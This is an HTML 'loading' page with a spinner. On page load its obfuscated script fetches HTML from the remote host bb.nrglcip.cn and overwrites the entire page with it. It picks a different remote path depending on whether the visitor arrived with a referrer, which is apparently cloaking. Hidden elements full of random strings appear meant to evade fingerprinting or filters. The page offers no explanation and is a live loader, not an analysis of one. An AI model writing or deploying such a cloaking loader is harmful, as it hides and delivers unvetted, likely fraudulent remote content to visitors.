<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OeW0l5PC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OeW0l5PC .By4rdiWAjr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OeW0l5PC .content {
            line-height: 50px;
            text-align: center
        }

        .OeW0l5PC .img {
            width: 100%
        }

        .OeW0l5PC .mBcnVvGH {
            text-align: center
        }

        .OeW0l5PC .mBcnVvGH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OeW0l5PC .mBcnVvGH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OeW0l5PC .mBcnVvGH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OeW0l5PC .mBcnVvGH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OeW0l5PC .mBcnVvGH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OeW0l5PC .mBcnVvGH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OeW0l5PC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sqiOFV5SBeTWk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CbTsN = sqiOFV5SBeTWk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CbTsN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CbTsN +".html?a=share";
		}
		
        bE7C3dWs=url+"#"+new Date().getTime();
        bE7C3dWs && function() {
            $.get(bE7C3dWs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ebFGtPkUmnqwqCdxRm2ADMUOrRp</b>
<ul style='display:none' >GP3flG50XYjd223qWm3CJpS91c7l7Ay</ul>
<ul style='display:none' >GP3flG50XYjd223qWm3CJpS91c7l7Ay</ul>
<h1 style='display:none' >IuYRpBPlm7xE</h1>
<h1 style='display:none' >IuYRpBPlm7xE</h1>
<a  href='#' style='display:none'>VBKqlCtaEG8rbktXPEcFRkQ9pgbaY3BZKvOT0tUUYj8qGDG57tZPb7UCPZmxDUEsRp</a>
<b style='display:none' >ebFGtPkUmnqwqCdxRm2ADMUOrRp</b>
<ul style='display:none' >GP3flG50XYjd223qWm3CJpS91c7l7Ay</ul><div class="OeW0l5PC">
    <div class="By4rdiWAjr">
        <div class="mBcnVvGH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >zdFNWZu6qb88tD</b>
<p  style='display:none'>qlCm3nWYf2AXeWAu4eAmUzRPQW</p>
<h1 style='display:none' >Bou2PydHepnYh42MLw1Fmh36qVLQQue</h1></body>
</html>